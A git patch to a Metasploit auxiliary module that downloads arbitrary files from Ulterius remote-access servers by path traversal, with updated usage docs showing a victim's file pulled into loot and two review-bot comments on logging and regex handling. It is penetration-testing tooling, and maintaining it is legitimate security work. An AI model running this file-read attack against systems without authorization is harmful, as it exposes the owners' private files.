From 949b474a0ac1e3e845b0f1439cd2870e1e8d07cc Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 15 Feb 2018 16:31:09 -0600 Subject: [PATCH] Avoid target_uri.path It doesn't look like target_uri.path is suitable for this scenario, because it causes our input to be modified and hard to use. --- .../admin/http/ulterius_file_download.md | 10 +++++----- .../admin/http/ulterius_file_download.rb | 18 +++++++++++++----- 2 files changed, 18 insertions(+), 10 deletions(-) diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md index db946256cc..4c899443b4 100644 --- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md +++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md @@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa ## Options -**TARGETURI** +**PATH** This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`) @@ -36,7 +36,7 @@ Note: If you are using relative paths, use three periods when traversing down a - [ ] `set rhost ` - [ ] `run` - [ ] Verify loot contains file system paths from remote file system. -- [ ] `set targeturi '/:///'` +- [ ] `set path ':///'` - [ ] `run` - [ ] Verify contents of file 
@@ -53,11 +53,11 @@ msf5 auxiliary(admin/http/ulterius_file_download) > run [*] Starting to parse fileIndex.db... [*] Remote file paths saved in: filepath0 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt' -targeturi => /C:/users/pwnduser/desktop/tmp.txt +msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' +path => C:/users/pwnduser/desktop/tmp.txt msf5 auxiliary(admin/http/ulterius_file_download) > run -[*] /C:/users/pwnduser/desktop/tmp.txt +[*] C:/users/pwnduser/desktop/tmp.txt [*] File contents saved: filepath1 [*] Auxiliary module execution completed msf5 auxiliary(admin/http/ulterius_file_download) > diff --git a/modules/auxiliary/admin/http/ulterius_file_download.rb b/modules/auxiliary/admin/http/ulterius_file_download.rb index fc9356adaa..255650bbb5 100644 --- a/modules/auxiliary/admin/http/ulterius_file_download.rb +++ b/modules/auxiliary/admin/http/ulterius_file_download.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(22006), - OptString.new('TARGETURI', [true, 'Path to the file to download', '/.../fileIndex.db']), + OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']), ]) end @@ -73,9 +73,16 @@ class MetasploitModule < Msf::Auxiliary end def run + path = datastore['PATH'] + # Always make sure there is a starting slash so as an user, + # we don't need to worry about it. + path = "/#{path}" if path && path[0] != '/' + + print_status("Requesting: #{path}") + begin res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path), + 'uri' => normalize_uri(path), 'method' => 'GET' }) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, 
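Review bot: The new status line in `run` prints `path` before `normalize_uri` is applied, so the logged value can differ from the URI actually sent. Compute it once with `uri = normalize_uri(path)`, then use `print_status("Requesting: #{uri}")` and `'uri' => uri`, so the console output matches the request. If I recall the HttpClient mixin correctly, `normalize_uri` already guarantees a leading slash, which would make the manual prepend redundant; please confirm. If the prepend stays, `path = "/#{path}" if path && !path.start_with?('/')` reads more clearly, and the comment could be reworded to `# Prepend a leading slash so the operator does not have to supply one.` The body of `run` continues past the end of this hunk.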
@@ -83,14 +90,15 @@ class MetasploitModule < Msf::Auxiliary vprint_error("Failed: #{e.class} - #{e.message}") return end + if res && res.code == 200 - if target_uri.path =~ /fileIndex\.db/i + if path =~ /fileIndex\.db/i inflate_parse(res.body) else - print_status(target_uri.path) - myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, target_uri.path, 'Remote file system') + myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system') print_status("File contents saved: #{myloot.to_s}") end end end + end
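Review bot: A nil response or any status other than 200 falls through `if res && res.code == 200` without output, so a failed request looks the same as a run that produced nothing. An `else` branch with `print_error("Unexpected response: #{res ? res.code : 'no response'}")` would make the outcome explicit. Separately, `path =~ /fileIndex\.db/i` is unanchored, so any path that merely contains that string is passed to `inflate_parse`, which is not visible here and may not handle a body that is not the index format. `path =~ /fileIndex\.db\z/i` limits the branch to the index file itself. The start of `run` is outside this hunk.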